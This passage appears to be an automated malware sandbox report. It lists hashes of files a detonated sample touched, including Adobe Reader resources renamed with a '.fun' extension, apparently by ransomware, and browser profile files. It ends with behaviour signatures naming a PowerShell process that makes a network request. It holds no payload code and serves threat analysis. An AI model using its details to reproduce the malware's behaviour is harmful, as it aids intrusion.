| SHA512 | 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun
| MD5 | 0d35b2591dc256d3575b38c748338021 |
| SHA1 | 313f42a267f483e16e9dd223202c6679f243f02d |
| SHA256 | 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa |
| SHA512 | f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun
| MD5 | 433755fcc2552446eb1345dd28c924eb |
| SHA1 | 23863f5257bdc268015f31ab22434728e5982019 |
| SHA256 | d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b |
| SHA512 | de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun
| MD5 | 781ed8cdd7186821383d43d770d2e357 |
| SHA1 | 99638b49b4cfec881688b025467df9f6f15371e8 |
| SHA256 | a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4 |
| SHA512 | 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun
| MD5 | 72269cd78515bde3812a44fa4c1c028c |
| SHA1 | 87cada599a01acf0a43692f07a58f62f5d90d22c |
| SHA256 | 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7 |
| SHA512 | 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun
| MD5 | eda4add7a17cc3d53920dd85d5987a5f |
| SHA1 | 863dcc28a16e16f66f607790807299b4578e6319 |
| SHA256 | 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2 |
| SHA512 | d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun
| MD5 | 7dbb12df8a1a7faae12a7df93b48a7aa |
| SHA1 | 07800ce598bee0825598ad6f5513e2ba60d56645 |
| SHA256 | aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77 |
| SHA512 | 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun
| MD5 | 82a2e835674d50f1a9388aaf1b935002 |
| SHA1 | e09d0577da42a15ec1b71a887ff3e48cfbfeff1a |
| SHA256 | 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb |
| SHA512 | b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun
| MD5 | 150c9a9ed69b12d54ada958fcdbb1d8a |
| SHA1 | 804c540a51a8d14c6019d3886ece68f32f1631d5 |
| SHA256 | 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43 |
| SHA512 | 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun
| MD5 | be26a499465cfbb09a281f34012eada0 |
| SHA1 | b8544b9f569724a863e85209f81cd952acdea561 |
| SHA256 | 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5 |
| SHA512 | 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun
| MD5 | 0c680b0b1e428ebc7bff87da2553d512 |
| SHA1 | f801dedfc3796d7ec52ee8ba85f26f24bbd2627c |
| SHA256 | 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750 |
| SHA512 | 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun
| MD5 | ad091690b979144c795c59933373ea3f |
| SHA1 | 5d9e481bc96e6f53b6ff148b0da8417f63962ada |
| SHA256 | 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1 |
| SHA512 | 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun
| MD5 | 2de4e157bf747db92c978efce8754951 |
| SHA1 | c8d31effbb9621aefac55cf3d4ecf8db5e77f53d |
| SHA256 | 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9 |
| SHA512 | 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun
| MD5 | 6e333be79ea4454e2ae4a0649edc420d |
| SHA1 | 95a545127e10daea20fd38b29dcc66029bd3b8bc |
| SHA256 | 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36 |
| SHA512 | bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun
| MD5 | b8454390c3402747f7c5e46c69bea782 |
| SHA1 | e922c30891ff05939441d839bfe8e71ad9805ec0 |
| SHA256 | 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d |
| SHA512 | 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun
| MD5 | 3ae8789eb89621255cfd5708f5658dea |
| SHA1 | 6c3b530412474f62b91fd4393b636012c29217df |
| SHA256 | 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a |
| SHA512 | f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun
| MD5 | b7c62677ce78fbd3fb9c047665223fea |
| SHA1 | 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8 |
| SHA256 | aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2 |
| SHA512 | 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun
| MD5 | 117d6f863b5406cd4f2ac4ceaa4ba2c6 |
| SHA1 | 5cac25f217399ea050182d28b08301fd819f2b2e |
| SHA256 | 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362 |
| SHA512 | e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun
| MD5 | 51da980061401d9a49494b58225b2753 |
| SHA1 | 3445ffbf33f012ff638c1435f0834db9858f16d3 |
| SHA256 | 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44 |
| SHA512 | ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun
| MD5 | 2863e8df6fbbe35b81b590817dd42a04 |
| SHA1 | 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c |
| SHA256 | 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad |
| SHA512 | 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun
| MD5 | 79f6f006c95a4eb4141d6cedc7b2ebeb |
| SHA1 | 012ca3de08fb304f022f4ea9565ae465f53ab9e8 |
| SHA256 | e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e |
| SHA512 | c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun
| MD5 | f77086a1d20bca6ba75b8f2fef2f0247 |
| SHA1 | db7c58faaecd10e4b3473b74c1277603a75d6624 |
| SHA256 | cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d |
| SHA512 | a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun
| MD5 | b88e3983f77632fa21f1d11ac7e27a64 |
| SHA1 | 03a2b008cc3fe914910b0250ed4d49bd6b021393 |
| SHA256 | 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5 |
| SHA512 | 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun
| MD5 | e03c9cd255f1d8d6c03b52fee7273894 |
| SHA1 | d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e |
| SHA256 | 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6 |
| SHA512 | d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun
| MD5 | 62b1443d82968878c773a1414de23c82 |
| SHA1 | 192bbf788c31bc7e6fe840c0ea113992a8d8621c |
| SHA256 | 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24 |
| SHA512 | 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun
| MD5 | bca915870ae4ad0d86fcaba08a10f1fa |
| SHA1 | 7531259f5edae780e684a25635292bf4b2bb1aac |
| SHA256 | d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037 |
| SHA512 | 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun
| MD5 | 14145467d1e7bd96f1ffe21e0ae79199 |
| SHA1 | 5db5fbd88779a088fd1c4319ff26beb284ad0ff3 |
| SHA256 | 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38 |
| SHA512 | 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7 |
memory/3428-3824-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-3825-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-3826-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-3829-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-3830-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/2884-3831-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3832-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3833-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3843-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3842-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3841-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3840-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3839-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3838-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
memory/2884-3837-0x000001A4AA780000-0x000001A4AA781000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 54b2455bfcdddf3c06291afc710b4f11 |
| SHA1 | a174a51217de5cbdf959e83677b25c5722223e28 |
| SHA256 | fafcd6b8f27b5df5c1b68a819c252d50b7db403ac6be9aae50dbb226528a728b |
| SHA512 | e85ff8341fac21e5252f55a8cb833d3d498bd766e23987f9fd059d7b196bb0ed10230e90dfc26956752a7b49a2971ad17fde1787ea18af5f1b1b880b0da2c50b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 72fd997643f377e598a94b56fd757298 |
| SHA1 | f89647302abba836fae8f18f312997ebae7b8332 |
| SHA256 | 4dd8ede795910cd3dab744e6fe7c66bb195a68fa5021e36d5be31dcb41f76c92 |
| SHA512 | 4e2df8a2a436c4229f87cd2ce31f48c639236e6412d0e7911a2507f13000cce9d246804f5083fd90e628c1a0e2122ae6ca2d5695c41dcddefff159ccc045cf3f |
\??\pipe\LOCAL\crashpad_3548_EVIKICAXLOFNQCAB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 47f25abfb63f30fbbd3252de5f576beb |
| SHA1 | 34f1e502699adfb251a42589eca267fe5c1fbae0 |
| SHA256 | 117d877bd0b3ce08ce73d02f32cf3074a0af0a75483224358f474d7fae8dce17 |
| SHA512 | 7297075c02cbbb1002a7220e075e3ceb035c72092b061a345e50231cc8c1d7265dcd8ce508d60c5b6a0a883cc3df736d1cd165e3c064bea6e25c1f3ba36fc145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 70e9da5b08506dc7b1633b22af2c5e7f |
| SHA1 | 309d197fb0bfbfd93e44acf88222c50fc8de965d |
| SHA256 | 276f77c7b64bbe94711af616aeb03ae943a1d2eb941b6e3174896ea6f8d36420 |
| SHA512 | 3bfcfeeb7d50299fc8bd2b43f0c6d30893a19a6b8564ed25296ebcbf3716640142291516529be21a2e4009735280fbf0cdb00026d80d9a0133348b2cc9436159 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 10e64fe948d832948d1c1c059a133849 |
| SHA1 | 6cc7a0534ff745c6bdbc44e19c0ead01f3cd9830 |
| SHA256 | 6b64626fc0ba3a847d9abbdbcfa3310d65431e68cd14c9bc41fb118b72351504 |
| SHA512 | 3896c5cc4da7f0479fb16b9c2b0132e79c87c018b56682af4cd3ac74b0d665f685d84e9bb529d8709fb7f110b95f27a9511941d940f0eba7ea75b8b49e12b993 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1653479da817d09f7eb67986a9148ba7 |
| SHA1 | ef38bdd57d2d2130685d009c6711d9731597805d |
| SHA256 | fd6fa0e7c7f58648e5e962495f322f0cf348a9fc2638374aff6be2d0cbea662d |
| SHA512 | 0d091452cf929beac2105ac8897e18abad0393d3aeb5904ce5b8683fc63b10785ad69dd57f79ecec28420742816d403a19dd98ee0d6bc70b4dceb4d09a21a071 |
memory/3428-3979-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0
| MD5 | 81c745a7b9da1870cb19b0adfba3e11c |
| SHA1 | fae41656aacf3fac21e386c58766b9f9b8e6700d |
| SHA256 | fe15bddb3882ff5c83526c80620fdad5412d911c553bb351816ee26f8d61a91d |
| SHA512 | 5faef262e2fa510d67728a6d327c56f95238d87aa9a1429718263cd44c0293f4da8529fa9d82c2ba12ae9b1794ac56b1f9e46e26a55beabb80d893c3c3cfa6bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | cfd2fdfedddc08d2932df2d665e36745 |
| SHA1 | b3ddd2ea3ff672a4f0babe49ed656b33800e79d0 |
| SHA256 | 576cff014b4dea0ff3a0c7a4044503b758bceb6a30c2678a1177446f456a4536 |
| SHA512 | 394c2f25b002b77fd5c12a4872fd669a0ef10c663b2803eb66e2cdaee48ca386e1f76fe552200535c30b05b7f21091a472a50271cd9620131dfb2317276dbe6c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
| MD5 | 1d5f57b36984d3bc13513937212f7c85 |
| SHA1 | 6962d480bc6216080b90505c9f25c8a3ed4c8df0 |
| SHA256 | 7c5544c2101aa4a9ab3bd0ed98d6d1126457f802c8073333d2e7fb7be273dc30 |
| SHA512 | dcb01342a2eb9ff3ed03a23b7e0914ccb626e1136c2a24dc4e8144cd785c90acdbffc877408a922519055f0a375b4a31172e3120744de656d55dcd83b84a4f4a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
| MD5 | 26a31ce75ac8de1d6c95dfa64a71c9ef |
| SHA1 | 344db07d1d45301e7ac65978f8a9756b0e6e6fe5 |
| SHA256 | 021c57f13e1e9eeefa54e0b14f352549bb3772e8b0d846b27c0b04eac1d585ef |
| SHA512 | 8ec5e308b3fa0f40255546576d5f0a014db71f14d992c35c66f8eb3d981dba74fa7fde308b8e34431f28a58b24e0e0cec5fb076811614985d88a196c91806c5c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3
| MD5 | c1bcbe601dd74de7e292508c7d4690d2 |
| SHA1 | 507efa66aece1f3a8517211f8c01fc2cdf8e11c2 |
| SHA256 | 414426141bafd1eb80481706dde44b584f0ae5a4bbfc05e89912b05343c4e8fd |
| SHA512 | 43342a45b995aa305f68678d34a6f8c28086f90e40c4ce0604f83f16a42a653c43ce76123487ead556d04c9e7545df68314a8a6fc32811a5b0efbb692eab4cb7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2
| MD5 | c4cc026ba9c6a06fb7237734d18d13a0 |
| SHA1 | 65b5b78b21cc2f82ddb5b7ede3777872a676c5ee |
| SHA256 | c620ab7d666c26e8873b9805fcb06d812fb6c5e7ecb55198b8dd924b17da486f |
| SHA512 | 7311a34058c0671e1fea5b5863c8744d5df8abaf85865825a8e013639d36daaf8556c92e18fb32d28fda8c591e643e962d4ac08bb0ec1e8a0f5551b5400dbfc0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 01970935c674f63ca63204d759a8c7cb |
| SHA1 | cba8da3336b3b50381861cd73a8b5108439b3069 |
| SHA256 | 6a1f6935f74975a5907d0676377abe28d77e841475389ac4e6e0a5c254362e5b |
| SHA512 | 278ca4a8c01d514580f412be09797488f2a6394541204ffc28761d05a520836bc960b270d291918b8d50abd1a8ddf064e92e94cf4082825716a86fcfd86c2b13 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3
| MD5 | 5ff8f8987906c1a7271ff7d9db09824e |
| SHA1 | d4ae9dc7afc8689a09708b71a6bcd0df112f195e |
| SHA256 | 19fea9161a1d71c6c2476aaba0586c64cf6cc5b29db8c1836e0146f24269c071 |
| SHA512 | b2f45874a3de891e7b5a359d550036c339094a032349217774a993f3d612b05852c76c38c4d3cf7cdc9922f83088e937f2bc7c3d8c6474d3f28b6e1ec71ee915 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0
| MD5 | 7a80e942bd78ca60aec4ed288dde8b75 |
| SHA1 | fdf7df7a014cfe4b8a7ec73059d4fa87c1169653 |
| SHA256 | 0fa04a271404bc3c9635d5f326d1a918857f60238b8784d2cfc683d6a1315f49 |
| SHA512 | 11a6c88d72894a2e75622a64d0b186e729196e65d56826af50377209949c1b763e13da2c2712fd146157aa36c2b5f365aac94302809354dcb9bf98fdd8012a6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
| MD5 | 5c6dfc6e77b99ee870e40d22bfab50a1 |
| SHA1 | 9a9045aa66242a04152f98920e54c9d3ba12e48c |
| SHA256 | 8e6490d21c00a1b7e079c896128ae16e0509771dc81a1bd3d3f605900299f892 |
| SHA512 | 32d1f23863e33babcde04b26d49db6655269537778245718b572d4595586e98bcf9b9c566e984b73ada30c5774fd9505ccab6786ed745e14742684b4ca2b9fed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 72e4c3ebb537e0f3004613ddcb1f1f7a |
| SHA1 | 189caeb981f4cd50c861744d69fa90a0a726aea8 |
| SHA256 | 96d6be3f6368eb7b759108d76717fa07adbce7c17f538d10bc04f71538460670 |
| SHA512 | 433652038e10b0473a9e552d63a6a8ade2defd8d82c09b64908e49e3b2bcde64cf09359c6ad0686f9faec3f614ab956ca7c94e915e3a024a779586d144c31588 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a9e8b8b5c1002967e8a3999a9cf3f2ae |
| SHA1 | 9586e32bca3acfdbddfe9283d71b2288bf225df6 |
| SHA256 | fe4727792968d55bf5006207f68631b4c5f964b2d3ee7fa2ab7a16c5d085e6f5 |
| SHA512 | 82ad63120da655ce80dddce99660b1156e4145275c0d5322d31a894af0a29def538348bfce1b4a742f2fdb0808f948f1db389c20aa82f4d689498bd88536d36f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d081d45ad4a76f9cd48ccadef2f18445 |
| SHA1 | e601ce653c9e6acf1f5429dabf0a21567dc858e2 |
| SHA256 | 072653951345a9019dcd9e33c1850d39eae0869565ccabad226850597053b01c |
| SHA512 | db25d3d4d0aca8b48c264b9fb5e4254bb0a3abefac07a16ac1fc1dda8a81ea17255b4e7c44d24564ca4806ddc19682f8184f9dc37e9b4b231742905d9ffdb21d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 5ef891f52576f52daa5eec976e97760c |
| SHA1 | 02c028947ea73c943539eb8a162f9231ceafe3cd |
| SHA256 | 774f23c7171a5bc84f53f9c1d61153b43defbc4b3589a608e01f6d46d2b0bc91 |
| SHA512 | 048598e3cfdbdc3832da4fd97b5d3d9a39a73ef3c2ead8dcac408ef576039ece040d0ac29ed210a5baa01cc818cd25261468ed53322e3dc4f49980d94f95ed8a |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\~tartUnifiedTileModelCache.tmp
| MD5 | 907f7b3d3410d67b7a65b849fe4c5c66 |
| SHA1 | 0d1f94d02810d191376d8d2a39c7f385e6f85785 |
| SHA256 | fb2c68005df09ffdd2520d038bf095ea209864a82168b10ee7d625c6e2a32276 |
| SHA512 | 861d05c8f9a3f250e5ffe6fb6eff205d9d267d4fd1eb896ddc009152235613297709d99fa1735d6ab5ddef09769019801b5e6a79f03db7d78fd693d4488fcec2 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1385s
Max time network
1176s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
